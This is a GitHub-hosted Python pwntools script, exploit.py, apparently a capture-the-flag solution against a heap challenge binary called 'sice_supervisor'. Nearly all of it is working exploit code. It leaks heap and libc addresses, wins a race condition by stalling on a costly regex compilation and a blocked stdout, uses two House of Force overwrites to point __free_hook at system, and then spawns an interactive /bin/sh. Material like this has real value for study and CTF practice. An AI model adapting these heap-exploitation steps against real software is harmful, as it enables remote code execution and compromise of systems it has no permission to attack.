-
Notifications
You must be signed in to change notification settings - Fork 10
/
Copy pathexploit.py
210 lines (156 loc) · 5.61 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
import re
import sys
import time
from pwn import *
path = './sice_supervisor'
host = 'localhost'
port = 3000
libc = ELF('./libs/libc.so.6')
SLEEP_TIME = 3
if len(sys.argv) > 1:
p = process(path, stderr=2)
#p = gdb.debug(path, '''
# c
#''', api=True, aslr=True)
else:
p = remote(host, port)
def numb(num):
return str(num).encode('ascii')
CHUNK_SIZE = 1000
def deploy():
p.sendlineafter(b'4. Exit\n', numb(1))
def sice(i, data):
chunks = [data[i:i+CHUNK_SIZE] for i in range(0, len(data), CHUNK_SIZE)]
for c in chunks:
p.sendlineafter(b'4. Exit\n', numb(2), timeout=2)
p.sendlineafter(b'Which deet daemon do you want to sice?\n', numb(i))
p.sendafter(b'What do you want to sice?\n', c)
def regex(i, regex):
if isinstance(regex, str):
regex = regex.encode('ascii')
p.sendlineafter(b'4. Exit\n', numb(3))
p.sendlineafter(b'Which deet daemon do you want to filter?\n', numb(i))
p.sendafter(b"What's your filter?\n", regex)
# FIRST STAGE: obtain heap leak
# create deet daemon 0
deploy()
# add deet 0 with unsorted bin size
sice(0, b'1\n1500\n')
# add deet 1 to avoid coalescing between deet 0 chunk and top
sice(0, b'1\n24\n')
# add deet 2 to leak 0x20 tcache address later
# jk we dont use these lmao
sice(0, b'1\n24\n')
# free deet 0 into unsorted bin and allocate again to place libc address inside
sice(0, b'2\n0\n')
sice(0, b'1\n3\n')
# edit deet 0 to overwrite null byte from arena address (which is super aligned for some reason)
sice(0, f'3\n0\nAAA\x00\n'.encode('ascii'))
# get libc leak by printing deet 0
sice(0, b'4\n0\n')
p.recvuntil(b'Viewing deet\n')
leak = p.recvuntil(b'\nDone!\n', drop=True)
# process leak to obtain arena address
leak = b'\x00\x00\x00' + leak[3:]
leak = leak.ljust(8, b'\x00')
arena = u64(leak)
#libc.address = arena + (0x7f7b21800000 - 0x7f7b1c000000)
log.info(f"arena addr: 0x{arena:x}")
#log.info(f"libc addr: 0x{libc.address:x}")
#p.interactive()
# SECOND STAGE: prepare for house of force by overwriting chunk size
# add deet 3 with size 100000
sice(0, b'1\n100000\n')
# edit deet 3 to add huge string
# this will be used to fill pipe buffer and lock stdout, allowing for race condition
string = 'A' * 99000 + 'B'
sice(0, f'3\n3\n{string}\x00\n'.encode('ascii'))
# create new deet 4 which will be adjacent to top of size 0x7d0
sice(0, b'1\n1992\n')
# wait for current sices to finish
time.sleep(3 * SLEEP_TIME + 1)
# add expensive-to-compile regex to deet daemon 0
# this will take ~40 seconds to compile, which gives enough time to bypass the sleep(5)
amount = 1_700_000_000
regex(0, f'(?:){{{amount}}}')
# viewing deet 3 will trigger regex compilation
# from here, we can do ~fun race conditions~
sice(0, b'4\n3\n')
sice(0, b'4\n3\n')
# attempt to edit deet 4
# this will pause on the puts in edit_deet, since stdout is currently locked
# however, since this is after the bounds check on i, we can trick it into editing with old size
payload = b'A' * (1600 - 8) + p64(0xfffffffffffffff5)
sice(0, b'3\n4\n%b\x00\n' % payload)
# delete deet 4 and replace with smaller chunk
# this will cause edit to overflow into top size since it is using old larger size
sice(0, b'2\n4\n')
sice(0, b'1\n1592\n')
# THIRD STAGE: house of force over to next arena ptr to leak libc
p.recvuntil(b'AAAB')
log.info('Entering 3rd stage...')
top = 0x7f7a54019e30
#target = top + 0x2000
target = 0x7f7a54000880
size = ((target - top) % 2**64) - 8
# allocate deet 5 with target size to move top to right before next arena ptr
payload = b'1\n%d\n' % size
sice(0, payload)
# allocate deet 6 to obtain pointer to libc which we will leak
# we want this to be pretty large, since we don't want to corrupt what we already have
sice(0, b'1\n1784\n')
# allocate deet 7 to remove largebin entry
sice(0, b'1\n1472\n')
# leak!!!
sice(0, b'4\n6\n')
p.recvuntil(b'Viewing deet\n')
leak = p.recvuntil(b'\nDone!\n', drop=True)
leak = leak.ljust(8, b'\x00')
libc.address = u64(leak) - (0x7f5e6c3ebc40 - 0x7f5e6c000000)
log.info(f"libc base: 0x{libc.address:x}")
# --------------
# FOURTH STAGE: house of force again to overwrite free hook with system
# --------------
# create new deet 8 that is adjacent to top for coalesce
sice(0, b'1\n168\n')
# edit deet 3 again since we probably wrote a null byte into it by accident
#string = 'A' * 99000 + 'B'
#sice(0, f'3\n3\n{string}\x00\n'.encode('ascii'))
time.sleep(1 * SLEEP_TIME + 1)
# regex stuff!
amount = 1_700_000_000
regex(0, f'(?:){{{amount}}}')
# race condition!
# we are still using deet 3 for this
sice(0, b'4\n3\n')
sice(0, b'4\n3\n')
# calc house of force size
target = libc.symbols['__free_hook'] - 8
top = arena + 0xfd0
size = ((target - top) % 2**64) - 8
# attempt to edit deet 8
# this will pause on the puts in edit_deet, since stdout is currently locked
# however, since this is after the bounds check on i, we can trick it into editing with old size
payload = b'/bin/sh\x00'.ljust((80 - 8), b'B') + p64(size + 8 + libc.symbols['system'])
sice(0, b'3\n8\n%b\n' % payload)
# delete deet 8 and replace with smaller chunk
# this will cause edit to overflow into top size since it is using old larger size
sice(0, b'2\n8\n')
sice(0, b'1\n72\n')
# pause until printing unblocks
p.recvuntil(b'AAAB')
# add deet 9 with targeted size
# this will put top on free hook
payload = b'1\n%d\n' % size
sice(0, payload)
# free deet 8 to do system("/bin/sh")
sice(0, b'2\n8\n')
# execute commands!!
sice(0, b'ls')
# add deet 10 with /bin/sh string + overwriting free hook
#sice(0, b'1\n72\n')
#payload = b'/bin/sh'.ljust(24, b'\x00')
#payload += p64(libc.symbols['system'])
#payload = payload.ljust(72, b'\x00')
#sice(0, b'3\n10\n%b\n' % payload)
p.interactive()